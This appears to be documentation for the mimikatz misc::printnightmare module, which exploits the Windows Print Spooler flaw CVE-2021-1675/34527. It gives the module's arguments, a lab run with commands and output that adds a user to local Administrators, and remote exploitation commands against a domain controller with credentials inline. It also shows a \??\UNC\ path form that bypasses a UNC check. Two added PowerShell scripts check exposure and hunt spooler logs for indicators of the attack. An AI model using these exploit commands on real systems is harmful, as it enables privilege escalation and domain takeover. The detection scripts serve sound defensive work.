printnightmare

misc::printnightmare exploits the PrintNightmare vulnerability (CVE-2021-1675 / CVE-2021-34527) through both the [MS-RPRN RpcAddPrinterDriverEx] and the [MS-PAR AddPrinterDriverEx] entry points: it registers a printer driver whose files point at an attacker-supplied DLL, which the spooler service then loads. The bug was discovered by Zhiniang Peng (@edwardzpeng) and Xuefeng Li (@lxf02942370); the MS-PAR variant was found by cube0x0. The module takes the following command line arguments:

  • /server: the target server or workstation to exploit (omit it to target the local spooler over ncalrpc)

  • /x64 or /win64: the target server or workstation is 64-bit

  • /x86 or /win32: the target server or workstation is 32-bit

  • /library: the DLL to register as the driver file; a local path, or a UNC path the target's spooler can reach

  • /authuser: the username to authenticate with during exploitation

  • /authdomain: the Active Directory domain of that user

  • /authpassword: the password of that user

  • /clean: clean up after a previous run instead of exploiting

The following example demonstrates local privilege escalation through misc::printnightmare. As can be seen, the test user is not part of the local Administrators group on the Win10.hacklab.local machine:

PS C:\Users\m3g9tr0n> net user

User accounts for \\WIN10

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
test                     vs2022                   WDAGUtilityAccount
The command completed successfully.

PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
vs2022
The command completed successfully.

Running the module locally (no /server), with a DLL in a path the spooler can read, that adds test to the local Administrators group when loaded. The driver is registered, the DLL is loaded by the spooler, and the driver entry is removed again:

mimikatz # misc::printnightmare /library:C:\Users\Public\DLL.dll
[ms-rprn/ncalrpc] local
> RpcGetPrinterDriverDirectory: C:\Windows\system32\spool\DRIVERS\x64
| mimikatz-{55911f3b-474e-4b31-bb55-a2a6b4fc1e76}-legitprinter / Windows x64 - 0x00008018 - C:\Users\Public\DLL.dll
> RpcAddPrinterDriverEx: OK!
> RpcDeletePrinterDriverEx: OK!

The test user is now part of the local administrators group:

PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
test
vs2022
The command completed successfully.
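Before running the module, a practitioner wants to know whether the host still meets the conditions it relies on. The following is an added example (not mimikatz code): a PowerShell check of the spooler service and the registry values Microsoft documents for CVE-2021-34527 and the August 2021 update (KB5005652). The exposure logic assumes a host that carries the July and August 2021 spooler updates; older hosts are exploitable with fewer or none of these conditions, so verify the patch level separately. Remote use assumes WinRM access to the target.

```powershell
# Added example, not part of mimikatz: pre-flight check of the conditions
# misc::printnightmare relies on. Registry value names are the ones Microsoft
# documents for CVE-2021-34527 / KB5005652.

function Test-PrintNightmareExposure {
    [CmdletBinding()]
    param(
        [string]$ComputerName = $env:COMPUTERNAME
    )

    $probe = {
        $printers = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
        $pnp      = Join-Path $printers 'PointAndPrint'

        # Returns $null when the key or the value does not exist
        function Get-RegValue([string]$Path, [string]$Name) {
            (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
        }

        $spooler      = Get-Service -Name Spooler -ErrorAction SilentlyContinue
        $running      = [bool]($spooler -and $spooler.Status -eq 'Running')
        $restrict     = Get-RegValue $pnp 'RestrictDriverInstallationToAdministrators'
        $noWarning    = Get-RegValue $pnp 'NoWarningNoElevationOnInstall'
        $updatePrompt = Get-RegValue $pnp 'UpdatePromptSettings'
        $remoteRpc    = Get-RegValue $printers 'RegisterSpoolerRemoteRpcEndPoint'

        # KB5005652 makes 1 the default (administrators only). An explicit 0
        # re-enables driver installation by non-administrators.
        $nonAdminDrivers = ($restrict -eq 0)

        # Either non-default Point and Print value removes the elevation prompt,
        # which is what the July 2021 fix keys its check on.
        $promptsDisabled = ($noWarning -eq 1) -or ($updatePrompt -eq 2)

        # Assumption: host has the July and August 2021 updates. Without them the
        # registry state is irrelevant and the host is exploitable regardless.
        $exposed = $running -and $nonAdminDrivers -and $promptsDisabled

        [pscustomobject]@{
            Computer                                   = $env:COMPUTERNAME
            SpoolerRunning                             = $running
            RemoteRpcEndpointDisabled                  = ($remoteRpc -eq 2)   # 2 = client connections refused
            RestrictDriverInstallationToAdministrators = $restrict
            NoWarningNoElevationOnInstall              = $noWarning
            UpdatePromptSettings                       = $updatePrompt
            LocalExposure                              = $exposed
            RemoteExposure                             = $exposed -and ($remoteRpc -ne 2)
        }
    }

    if ($ComputerName -eq $env:COMPUTERNAME) {
        & $probe
    } else {
        Invoke-Command -ComputerName $ComputerName -ScriptBlock $probe
    }
}

Test-PrintNightmareExposure                                   # local host
# Test-PrintNightmareExposure -ComputerName dc.hacklab.local  # over WinRM
```

RemoteRpcEndpointDisabled reflects the "Allow Print Spooler to accept client connections" policy; when it is disabled the MS-RPRN and MS-PAR interfaces are not reachable over the network, but a local run over ncalrpc is still possible, which is why the object reports local and remote exposure separately.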

For remote exploitation, /server names the target, /library points at a DLL on a share the target's spooler can reach, and /authuser, /authpassword and /authdomain supply the domain account used for the RPC call:

mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local

If the target rejects a plain \\host\share driver path, the same DLL can be referenced through the \??\UNC\ object-manager form, which bypasses that UNC path check:

mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\??\UNC\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local
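On the defensive side, both the local and the remote run leave traces in the target's PrintService operational log. The following is an added example (not mimikatz code) that hunts that log for driver installs matching what the module's own output above shows: a driver named mimikatz-<guid>-legitprinter and a library loaded from a user-writable path or a UNC share, in either the plain \\host\share or the \??\UNC\host\share form. The indicator patterns are this example's assumptions, and the log must be enabled on the target for anything to be recorded.

```powershell
# Added example, not part of mimikatz: hunt Microsoft-Windows-PrintService/Operational
# for driver installs that look like misc::printnightmare.
#   Event 316: a printer driver was added or updated (message lists its files)
#   Event 808: the spooler failed to load a plug-in module (the driver DLL)
# The log is disabled by default; enable it with:
#   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true

function Find-PrintNightmareDriverEvents {
    [CmdletBinding()]
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$Days = 7
    )

    $filter = @{
        LogName   = 'Microsoft-Windows-PrintService/Operational'
        Id        = 316, 808
        StartTime = (Get-Date).AddDays(-$Days)
    }

    # Indicator regexes (assumptions for this example). PowerShell -match is
    # case-insensitive, so no (?i) is needed.
    $indicators = @(
        'mimikatz',                  # driver name used by the module
        '\\\\[^\s\\]+\\[^\s\\]+',    # \\host\share
        '\\\?\?\\UNC\\',             # \??\UNC\host\share
        'C:\\Users\\',               # user-writable local path
        '\\Windows\\Temp\\'
    )

    # Get-WinEvent emits a non-terminating error when the log is disabled or empty
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $matched = foreach ($re in $indicators) { if ($_.Message -match $re) { $re } }
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                Id          = $_.Id
                Suspicious  = [bool]$matched
                Indicators  = ($matched -join '; ')
                Message     = ($_.Message -replace '\s+', ' ')
            }
        } |
        Where-Object Suspicious |
        Sort-Object TimeCreated
}

Find-PrintNightmareDriverEvents | Format-List
# Find-PrintNightmareDriverEvents -ComputerName dc.hacklab.local -Days 30
```

A 316 event whose file list sits outside C:\Windows\system32\spool\DRIVERS, or an 808 for a module the spooler could not load, is worth a look even without a name match; the indicator list only narrows the output, it does not define the technique.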
